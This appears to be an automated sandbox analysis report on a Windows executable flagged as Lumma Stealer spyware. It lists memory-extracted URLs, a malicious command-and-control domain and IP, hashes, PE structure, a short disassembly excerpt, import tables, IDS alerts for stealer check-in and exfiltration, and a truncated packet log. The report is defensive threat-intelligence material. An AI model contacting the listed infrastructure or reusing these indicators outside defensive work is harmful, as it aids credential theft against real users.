                                  https://duckduckgo.com/chrome_newtabdxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icodxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://volcanohushe.click/dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479269620.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479395130.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://volcanohushe.click/Hdxdiag.exe, 00000003.00000002.1631649522.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596096341.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620854063.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1596299613.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://volcanohushe.click/apie4dxdiag.exe, 00000003.00000003.1621063252.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002D05000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://ocsp.rootca1.amazontrust.com0:dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYidxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://volcanohushe.click/apiHdxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1479470457.0000000002D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44dxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://volcanohushe.clickdxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1621063252.0000000002CE6000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579403717.0000000002CDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://volcanohushe.click/kdxdiag.exe, 00000003.00000003.1579563478.0000000002D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://x1.c.lencr.org/0dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://x1.i.lencr.org/0dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://volcanohushe.click/apieOdxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?dxdiag.exe, 00000003.00000003.1529173179.000000000520C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://volcanohushe.click/apiBGdxdiag.exe, 00000003.00000002.1631649522.0000000002D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&udxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctadxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgdxdiag.exe, 00000003.00000003.1555722858.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://volcanohushe.click/apisdxdiag.exe, 00000003.00000002.1631649522.0000000002D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://support.mozilla.org/products/firefoxgro.alldxdiag.exe, 00000003.00000003.1530494784.0000000005470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://volcanohushe.click/apiedxdiag.exe, 00000003.00000003.1528700860.0000000005163000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://volcanohushe.click/apifdxdiag.exe, 00000003.00000003.1579103745.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dxdiag.exe, 00000003.00000003.1480479336.000000000518C000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480549114.0000000005189000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1480719818.0000000005189000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.71.155
                                                                                                      volcanohushe.clickUnited States
                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1579571
                                                                                                      Start date and time:2024-12-23 01:21:09 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 4m 40s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:bas.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/0@1/1
                                                                                                      EGA Information:Failed
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target bas.exe, PID 7420 because there are no executed function
                                                                                                      • Execution Graph export aborted for target dxdiag.exe, PID 7524 because there are no executed function
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      TimeTypeDescription
                                                                                                      19:22:09API Interceptor8x Sleep call for process: dxdiag.exe modified
                                                                                                      No context
                                                                                                      No context
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUStg.exeGet hashmaliciousBabadedaBrowse
                                                                                                      • 172.67.74.152
                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.157.254
                                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                      • 104.26.12.205
                                                                                                      setup.exeGet hashmaliciousBabadedaBrowse
                                                                                                      • 104.26.13.205
                                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                      • 104.21.80.1
                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.66.86
                                                                                                      installer.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.164.25
                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.19.35
                                                                                                      Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 172.64.41.3
                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.66.86
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                                      • 104.21.71.155
                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.71.155
                                                                                                      No context
                                                                                                      No created / dropped files found
                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):7.752878047119261
                                                                                                      TrID:
                                                                                                      • Win64 Executable GUI (202006/5) 91.80%
                                                                                                      • Win64 Executable (generic) (12005/4) 5.46%
                                                                                                      • Clipper DOS Executable (2020/12) 0.92%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.91%
                                                                                                      • DOS Executable Generic (2002/1) 0.91%
                                                                                                      File name:bas.exe
                                                                                                      File size:13'164'032 bytes
                                                                                                      MD5:d5139ae53cb10a64c9245bbf3447ed1c
                                                                                                      SHA1:727199337e080c162fd86558a697b3bcbce646e1
                                                                                                      SHA256:8ad2dcb075a7da5785530bc805b5391a397e1c659bedcb564774b6940b7fcbed
                                                                                                      SHA512:e0efdd485460975a43c6b472554df08cc3e3ea60bc7e71b7477909748ad5c0ba566fc70110ff87717f704ecc96688b13bd62b5fd116bc2719fd381ab3908bdc6
                                                                                                      SSDEEP:393216:+v4V9WRLAsEb6hCFcXLVsasjQsIyQ+/jn7:+v4TyA/bApXhOhQ+/7
                                                                                                      TLSH:AFD6D1298A7BC9C4F06BA030E89611338B32F51857ADE5F575970642CF9A0269FDF336
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...7.hg.........."..........>......X:.........@.............................`............`........................................
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x140093a58
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x140000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x67680F37 [Sun Dec 22 13:08:07 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:7bb4e8cef6a9f350a8f5dc71e7b3773c
                                                                                                      Instruction
                                                                                                      dec eax
                                                                                                      sub esp, 28h
                                                                                                      call 00007F7F10B1E430h
                                                                                                      dec eax
                                                                                                      add esp, 28h
                                                                                                      jmp 00007F7F10B1E29Fh
                                                                                                      int3
                                                                                                      int3
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                      push ebp
                                                                                                      dec eax
                                                                                                      mov ebp, esp
                                                                                                      dec eax
                                                                                                      sub esp, 30h
                                                                                                      dec eax
                                                                                                      mov eax, dword ptr [00BA9440h]
                                                                                                      dec eax
                                                                                                      mov ebx, 2DDFA232h
                                                                                                      cdq
                                                                                                      sub eax, dword ptr [eax]
                                                                                                      add byte ptr [eax+3Bh], cl
                                                                                                      ret
                                                                                                      jne 00007F7F10B1E496h
                                                                                                      dec eax
                                                                                                      and dword ptr [ebp+10h], 00000000h
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [ebp+10h]
                                                                                                      call dword ptr [00A5D882h]
                                                                                                      dec eax
                                                                                                      mov eax, dword ptr [ebp+10h]
                                                                                                      dec eax
                                                                                                      mov dword ptr [ebp-10h], eax
                                                                                                      call dword ptr [00A5D804h]
                                                                                                      mov eax, eax
                                                                                                      dec eax
                                                                                                      xor dword ptr [ebp-10h], eax
                                                                                                      call dword ptr [00A5D7F0h]
                                                                                                      mov eax, eax
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [ebp+18h]
                                                                                                      dec eax
                                                                                                      xor dword ptr [ebp-10h], eax
                                                                                                      call dword ptr [00A5D8E8h]
                                                                                                      mov eax, dword ptr [ebp+18h]
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [ebp-10h]
                                                                                                      dec eax
                                                                                                      shl eax, 20h
                                                                                                      dec eax
                                                                                                      xor eax, dword ptr [ebp+18h]
                                                                                                      dec eax
                                                                                                      xor eax, dword ptr [ebp-10h]
                                                                                                      dec eax
                                                                                                      xor eax, ecx
                                                                                                      dec eax
                                                                                                      mov ecx, FFFFFFFFh
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xaf0f100x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc480000x1b4.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0xc400000x471c.pdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc490000x4c018.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0xa0f6d00x28.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa09bf00x140.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xaf11d80x2a0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000xa9a1a0xa9c009022bf955907d19443dc9c1c05937627False0.34132944817746685data6.128686871082244IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0xab0000xa4aacc0xa4ac00730c728236536961e98542e16229e1bfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0xaf60000x1497700x147e00b6d04e54dcf0f82b4f7852477a367132False0.4186604972836447data4.676515858242816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .pdata0xc400000x471c0x48003852fea8a5c524d0c39a0c9b3652a982False0.5022786458333334data5.814729003118305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .fptable0xc450000x1000x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .tls0xc460000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      _RDATA0xc470000x2800x4003ea74578188a1448520b30c7c6f0ef06False0.2939453125data3.191461552490851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xc480000x1b40x200c7ba142499c72176de5305b1e419cf29False0.48828125data5.103911525545503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xc490000x4c0180x4c200a74e9f499148060928f902cd4a09957dFalse0.01549671592775041data5.432283010808474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_MANIFEST0xc480580x15bASCII text, with CRLF line terminatorsEnglishUnited States0.5446685878962536
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-23T01:22:09.042301+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:09.919391+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849706104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:09.919391+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849706104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:11.200792+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:11.956641+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849707104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:11.956641+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:13.656018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:16.080339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:18.557909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:21.368165+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:22.132533+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849712104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:23.820880+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713104.21.71.155443TCP
                                                                                                      2024-12-23T01:22:27.362380+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714104.21.71.155443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 23, 2024 01:22:07.786267996 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:07.786295891 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:07.786374092 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:07.813343048 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:07.813369989 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.042177916 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.042300940 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.045408010 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.045419931 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.045803070 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.097506046 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.169915915 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.169950962 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.170368910 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.919390917 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.919524908 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.919593096 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.952070951 CET49706443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.952091932 CET44349706104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.987184048 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.987253904 CET44349707104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:09.987355947 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.987771034 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:09.987787008 CET44349707104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:11.200716972 CET44349707104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:11.200792074 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:11.202291012 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:11.202311039 CET44349707104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:11.202662945 CET44349707104.21.71.155192.168.2.8
                                                                                                      Dec 23, 2024 01:22:11.203923941 CET49707443192.168.2.8104.21.71.155
                                                                                                      Dec 23, 2024 01:22:11.203962088 CET49707443192.168.2.8104.21.71.155
